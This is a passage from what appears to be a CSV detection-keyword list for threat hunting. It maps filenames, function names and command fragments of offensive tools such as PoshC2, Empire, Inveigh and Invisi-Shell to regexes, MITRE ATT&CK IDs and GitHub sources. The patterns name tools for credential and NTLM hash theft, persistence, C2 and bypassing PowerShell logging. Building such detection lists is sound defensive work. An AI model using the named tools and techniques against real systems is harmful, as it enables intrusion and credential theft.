tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*install_zerologon*",".{0,1000}install_zerologon.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*installexe-persistence*",".{0,1000}installexe\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Installing DHCP server and net-tools*",".{0,1000}Installing\sDHCP\sserver\sand\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*Install-Module -Name DSInternals*",".{0,1000}Install\-Module\s\-Name\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Install-Module ps2exe*",".{0,1000}Install\-Module\sps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*install-persistence*",".{0,1000}install\-persistence.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*install-persistence-cron*",".{0,1000}install\-persistence\-cron.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Install-ServiceBinary*",".{0,1000}Install\-ServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Install-SSP -Path*.dll*",".{0,1000}Install\-SSP\s\-Path.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Install-SSP.ps1*",".{0,1000}Install\-SSP\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*install-tor2web.sh*",".{0,1000}install\-tor2web\.sh.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*int PotatoAPI::findNTLMBytes*",".{0,1000}int\sPotatoAPI\:\:findNTLMBytes.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*Intercepter-NG*",".{0,1000}Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Intercepter-NG-1.0.zip*",".{0,1000}Intercepter\-NG\-1\.0\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Intercepter-NG-1.3.zip*",".{0,1000}Intercepter\-NG\-1\.3\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--interface * --wpad --lm --disable-ess*",".{0,1000}\-\-interface\s.{0,1000}\s\-\-wpad\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Internal-Monologue.exe*",".{0,1000}Internal\-Monologue\.exe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueDll*",".{0,1000}InternalMonologueDll.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueExe*",".{0,1000}InternalMonologueExe.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternetCrackUrl*",".{0,1000}InternetCrackUrl.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*IntruderPayloadGeneratorFactory.class*",".{0,1000}IntruderPayloadGeneratorFactory\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*IntruderPayloadProcessor.class*",".{0,1000}IntruderPayloadProcessor\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*IntruderPayloads*",".{0,1000}IntruderPayloads.{0,1000}","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3544","1177","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" "*-Inveigh *",".{0,1000}\-Inveigh\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh Relay*",".{0,1000}Inveigh\sRelay.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh.exe*",".{0,1000}Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Inveigh.ps1*",".{0,1000}Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.psd1*",".{0,1000}Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.psm1*",".{0,1000}Inveigh\.psm1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh.sln*",".{0,1000}Inveigh\.sln.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*inveigh_version*",".{0,1000}inveigh_version.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Cleartext.txt*",".{0,1000}Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-FormInput.txt*",".{0,1000}Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-Log.txt*",".{0,1000}Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-master*",".{0,1000}Inveigh\-master.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-net*.zip*",".{0,1000}Inveigh\-net.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv1.txt*",".{0,1000}Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*Inveigh-NTLMv2.txt*",".{0,1000}Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*-InveighRelay *",".{0,1000}\-InveighRelay\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Inveigh-Relay.ps1*",".{0,1000}Inveigh\-Relay\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*inveighzero.exe*",".{0,1000}inveighzero\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*InvisibilityCloak.py*",".{0,1000}InvisibilityCloak\.py.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "*Invisi-Shell*",".{0,1000}Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.cpp*",".{0,1000}InvisiShellProfiler\.cpp.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.def*",".{0,1000}InvisiShellProfiler\.def.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" 